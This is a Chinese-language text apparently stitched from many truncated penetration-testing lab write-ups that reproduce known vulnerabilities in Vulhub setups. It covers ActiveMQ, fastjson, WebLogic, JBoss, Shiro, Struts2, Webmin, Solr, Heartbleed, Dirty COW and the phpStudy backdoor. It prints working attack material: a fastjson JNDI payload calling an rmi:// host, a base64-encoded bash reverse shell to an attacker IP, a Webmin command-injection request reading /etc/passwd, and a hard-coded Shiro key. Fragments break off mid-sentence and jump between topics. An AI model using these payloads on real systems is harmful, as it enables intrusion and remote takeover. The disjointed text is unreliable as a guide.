Hello,各位小伙伴大家好~ 这里是一名白帽的成长史~ 最近在攻防演习中用到ActiveMQ的漏洞进行getshell 今天就来复现一下它的一系列漏洞吧~ Part.1 环境准备 环境说明 Apache 该中间件存在包括任意文件上传、反序列化等一系列历史漏洞。 环境搭建 Vulhub是一个基于docker和docker-compose的漏洞环境集合,配合docker进行使用。 首先根据官网说明,安装好vulhub: https://vulhub.org/ 通过vulhub进行漏洞环境搭建: 查看容器端口映射关系,搭建成功: Web服务端口为8161,尝试访问主页: http ://192.168.3.129:8161 Part.2 漏洞复现 默认口令&未授权访问 ActiveMQ的web控制台分三个应用,admin、api和fileserver,其中admin是管理员页面 当管理员访问Web管理页面并读取消息时,则会触发该漏洞。
漏洞简介事项描述漏洞概述fastjson在解析json的过程中,支持使用autoType来实例化某一个具体的类,并调用该类的set/get方法来访问属性。 漏洞编号CVE-2017-18349漏洞搭建这里使用vulhub的fastjson/1.2.24-rce进行复现。 访问http://192.168.146.167:37150/漏洞复现使用工具进行检测发现dnslog有数据,说明存在漏洞。 验证有漏洞之后,就尝试反弹shell。这里使用JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar进行进一步的漏洞利用。 然后发现漏洞利用成功 {"handsome":{"@type":"Lcom.sun.rowset.JdbcRowSetImpl;","dataSourceName":"rmi://192.168.146.161
通达OA命令执行漏洞复现 目录 漏洞描述 漏洞等级 漏洞影响版本 修复建议 漏洞复现 ▶漏洞描述 通达OA是北京通达信科科技有限公司出品的 "Office Anywhere 通达网络智能办公系统"。 该漏洞无需登录即可触发。 com/oa/security/2020_A1.7.25.exe 2013版 http://cdndown.tongda2000.com/oa/security/2020_A1.6.20.exe ▶漏洞复现 安装好漏洞环境后,访问目标网站。默认账号:admin 密码为空 ◣脚本复现 首先用脚本复现,直接命令执行即可。 python3 tongda_rce.py 目标URL ◣手工复现 手工抓包验证,该漏洞存在于以下两个链接中,并且以下链接无需认证即可访问。
-d启动如下漏洞复现此漏洞复现需要下载ysoserial和exploit.py脚本,我们使用ysoserial开启JRMP服务java -cp ysoserial.jar ysoserial.exploit.JRMPListener 漏洞环境https://github.com/vulhub/vulhub启动环境docker-compose up -d启动如下漏洞复现输入此命令即可查看weblogic用户密码,密码随机,请自行docker ,但是此漏洞前提是需要知道后台管理员密码CVE-2020-14882(未授权+RCE)简介此次复现是两个漏洞组合导致远程命令执行,分别是CVE-2020-14882和CVE-2020-14883。 漏洞环境https://github.com/vulhub/vulhub启动环境docker-compose up -d启动如下漏洞复现通过该/console/css/%252e%252e%252fconsole.portal https://github.com/vulhub/vulhub启动环境docker-compose up -d启动如下漏洞复现https://github.com/DXask88MA/Weblogic-CVE
heartbleed漏洞复现 参考链接 1、先换源 换源可参考 2、配置环境,安装docker、dockers-compose sudo apt-get install docker sudo apt-get restart docker 进入openssl/heartbleed目录,执行以下命令,在后台创建服务 sudo docker-compose up -d 输入docker ps查看服务运行状态(发现漏洞存在于 443端口) 用kali作为攻击机扫描漏洞,发现存在heartbleed漏洞 nmap -sV -p --script ssl-heartbleed.nse 192.168.43.131 启动
然后和jboss4一样访问页面即可 这次上传的时候确实有流量了,但是上传的却不完整,所以也没有办法成功复现,我觉得应该是vulnhub的环境问题 JBoss Administration Console JBOSS反序列化漏洞合集 由于反序列化漏洞的攻击方式都是一样的,只是漏洞发生的文件和成因不同,所以就以JBoss 5.x/6.x 反序列化漏洞(CVE-2017-12149)为例子过一遍流程 JBoss 500说明存在漏洞 ? 漏洞验证: 访问/jbossmq-httpil/HTTPServerILServlet,出现以下页面代表存在漏洞 ? /jexboss.py -host http://192.168.200.43:8080/ 首先会先扫描是否存在漏洞,然后验证未授权漏洞 ? 未授权漏洞验证失败后验证反序列化漏洞 ?
docker搜索xxe相关镜像包,然后pull下来,我这里pull的是:rrodrigo/xxelab 镜像包。
github.com/vulhub/vulhub/blob/master/weblogic/weak_password/README.md weblogic之SSRF Vul:Weblogic中存在一个SSRF漏洞 ,利用该漏洞可以发送任意HTTP请求,进而攻击内网中redis、fastcgi等脆弱组件 访问 http://192.168.42.128:7001/uddiexplorer/ ? nc -l -p 8888监听即可 weblogic之XMLDecoder反序列化漏洞(CVE-2017-10271) Vul:Weblogic的WLS Security组件对外提供webservice 服务,其中使用了XMLDecoder来解析用户传入的XML数据,在解析的过程中出现反序列化漏洞,导致可执行任意命令。 访问 http://192.168.42.128:7001/wls-wsat/CoordinatorPortType11,存在下图则说明可能存在漏洞 ? 构造POST包发送数据反弹shell: ?
Nginx + php-fpm 的服务器,在使用如下配置的情况下,都可能存在远程代码执行漏洞: ? Tsudo apt install golang-go ?
目录 一,Weblogic简介 二,Weblogic漏洞环境搭建 三,Weblogic弱口令 四,CVE-2014-4210 漏洞环境 漏洞危害 漏洞复现 进行内网存活探测 一,Weblogic简介 二,Weblogic漏洞环境搭建 docker pull vulhub/weblogic:10.3.6.0-2017 docker run -dit -p 7001:7001 vulhub/weblogic :10.3.6.0-2017 访问:http://kali IP://7001/console 三,Weblogic弱口令 Weblogic 存在 默认口令漏洞: 可通过 cmd=ls 查看cmd就可以看到文件路径 四,CVE-2014-4210 漏洞环境 FOFA搜app="Weblogic_interface_7001" 漏洞危害 Weblogic 漏洞复现 http://your-IP:7001/uddiexplorer/SearchPublicRegistries.jsp 进行内网存活探测 http://your-IP:7001/
今天一起来看看CVE-2017-10271的复现吧~ ? ? Part.1 漏洞说明 漏洞说明 1、漏洞描述 WebLogic WLS组件中存在CVE-2017-10271远程代码执行漏洞,可以构造请求对运行WebLogic中间件的主机进行攻击,近期发现此漏洞的利用方式为传播挖矿程序 2、部署漏洞环境 如果刚开机,需要先启动docker: ? Part.3 漏洞复现 漏洞检测 可以直接使用工具进行漏洞检测: ? 如果存在该页面,则可能存在漏洞。 ?
注:本文中使用的域名是不存在DNS域传送漏洞的,本文仅用作技术交流学习用途,严禁将该文内容用于违法行为。 0x00 漏洞描述 DNS: 网域名称系统(英文:Domain Name System,缩写:DNS)是互联网的一项服务。 而“域传送”漏洞则是由于dns配置不当,本来只有备份服务器能获得主服务器的数据,由于漏洞导致任意client都能通过“域传送”获得主服务器的数据(zone数据库信息)。 0x01 漏洞利用 1、Windows下使用nslookup nslookup命令以两种方式运行:非交互式和交互式。 如果提示无法列出域,那就说明此域名不存在域传送漏洞。
Tomcat有一个管理后台,其用户名和密码在Tomcat安装目录下的conf omcat-users.xml文件中配置,不少管理员为了方便,经常采用弱口令。 Tomcat 支持在后台部署war包,可以直接将webshell部署到web目录下,如果tomcat后台管理用户存在弱口令,这很容易被利用上传webshell。
为复制得到的时间戳,shell.jsp为上传文件的名字 [5cf3141bd85a7d0b60f57d021d958250.jpeg] /ws_utc/begin.do ws_utc/begin.do我这里复现地也是有问题 3d2618b0235f8a48938d432d4e8a64f4.jpeg] Weblogic反序列化远程代码执行(CVE-2019-2725) 版本:10.3.6.0.0、12.1.3.0.0 这个漏洞的复现过程和上面的差不多 使用这两个漏洞组成的利用链,可通过一个GET请求在远程Weblogic服务器上以未授权的任意用户身份执行命令。 攻击者利用其他rmi绕过weblogic黑名单限制,然后在将加载的内容利用readObject解析,从而造成反序列化远程代码执行该漏洞,该漏洞主要由于T3服务触发,所有开放weblogic控制台7001 (CVE-2020-2551) 这个漏洞没有复现成功,所以就记录一下过程 版本:10.3.6.0.0,12.1.3.0.0,12.2.1.3.0,12.2.1.4.0 工具:https://pan.baidu.com
Shiro<1.2.4版本,其使用的密钥为固定密钥Shiro550kPH+bIxk5D2deZiIxcaaaA==,这就更容易导致RCE漏洞 漏洞复现 用vulhub复现 cd vulhub/shiro 漏洞检测 .do或者 .action 的网站后缀 漏洞复现 s2-001 使用Vuldb靶场进行复现 cd vulhub/struts2/s2-001 而后开启容器 docker-compose up 漏洞复现 cd vulhub/fastjson/1.2.24-rce docker-compose up -d 访问环境 在攻击机模拟json发送post请求 curl http://192.168.1.129 漏洞复现 准备反弹shell指令如下 bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEuMTI5LzY2NjYgMD4mMQ==}|{base64 漏洞复现 Vulhub复现 cd vulhub/weblogic/CVE-2017-10271 docker-compose up -d 开启环境后访问http://192.168.1.129:7001
复现环境:Kali2017、Metasploit2 复现思路:利用NFS服务将本地主机的ssh公钥传输到目标主机上,再利用ssh连接到目标主机 1、首先利用nmap扫描一下目标主机,查看是否存在ssh、 4、这个漏洞防御也主要在于权限的问题,本着最小权限的思想,对于一些普通文件所属用户普通用户即可,对于敏感的目录要限制普通用户访问。
该漏洞是 Linux 内核的内存子系统在处理写时拷贝(Copy-on-Write)时存在条件竞争漏洞, 导致可以破坏私有只读内存映射。 黑客可以在获取低权限的的本地用户后,利用此漏洞获取 其他只读内存映射的写权限,进一步获取 root 权限。 0X1 环境搭建 环境:Ubuntu-14.04.4-desktop-amd64.iso 利用条件:Linux kernel >= 2.6.22 0X2 漏洞复现 adduser test/123456 在诸多安全攻防环境中,该漏洞被作为提权的漏洞可能性非常大。 0X3 漏洞成因 Linux写时拷贝技术(copy-on-write) 在Linux系统中,fork()会产生一个和父进程完全相同的子进程,但子进程在此后多会exec系统调用,出于效率考虑,Linux系统中引入了
Webmin RCE 漏洞复现 Webmin是目前功能最强大的基于Web的Unix系统管理工具。管理员通过浏览器访问Webmin的各种管理功能并完成相应的管理动作。 正式开始 我的环境: 靶机:https://192.168.214.136:10000 攻击机:192.168.214.129 一般通过docker默认安装完以后就可以了,不需要再去改配置直接就可以复现漏洞 这个漏洞是存在于用户更改密码处,由于password_change.cgi文件在重置密码功能中存在一个代码执行漏洞 看到这个页面,接下来随便输入用户名密码进行抓包 然后更改数据包为 POST /password_change.cgi x-www-form-urlencoded Content-Length: 60 user=admin&old=test | cat /etc/passwd&new1=123456&new2=123456 查看返回包,发现命令执行漏洞
影响版本 5.0.0 到 8.3.1版本 漏洞复现 默认情况下params.resource.loader.enabled配置未打开,无法使用自定义模板。 Apache Solr 远程命令执行漏洞(CVE-2019-0193) 漏洞描述 2019年8月1日,Apache Solr官方发布了CVE-2019-0193漏洞预警,漏洞危害评级为严重。 影响范围 Apache Solr < 8.2.0 漏洞复现 搭建完成 ? 通过接口来获取所有 core 信息,因为我们构造 payload 需要 name 信息。 此次7.1.0之前版本总共爆出两个漏洞:XML实体扩展漏洞(XXE)和远程命令执行漏洞(RCE),二者可以连接成利用链,编号均为CVE-2017-12629。 漏洞复现 首先创建一个listener,其中设置exe的值为我们想执行的命令,args的值是命令参数: ?
0x01 漏洞简介 2019年9月20日,网上传出 phpStudy 软件存在后门,随后作者立即发布声明进行澄清,其真实情况是该软件官网于2016年被非法入侵,程序包自带PHP的php_xmlrpc.dll phpStudy2016-php-5.2.17 phpStudy2016-php-5.4.45 phpStudy2018-php-5.2.17 phpStudy2018-php-5.4.45 更多漏洞细节参考文章 :PHPStudy后门事件分析 0x02 环境准备 本次漏洞复现的演示靶场为phpStudy 2018中的php-5.2.17+Apache环境 phpStudy 2018 后门版:点击下载 提取码:nlnq 0x04 漏洞复现 1. 发现漏洞 BurpSuite是在做渗透测试时必不可少的抓包工具,因此利用BurpSuite的扩展插件在抓取数据包时进行自动分析检测,非常便捷。 BurpSuite-Extender-phpStudy-Backdoor-Scanner:点击下载 插件安装成功后,在每次抓包时就会自动的扫描分析漏洞是否存在,若存在漏洞,则会提示相应的告警信息。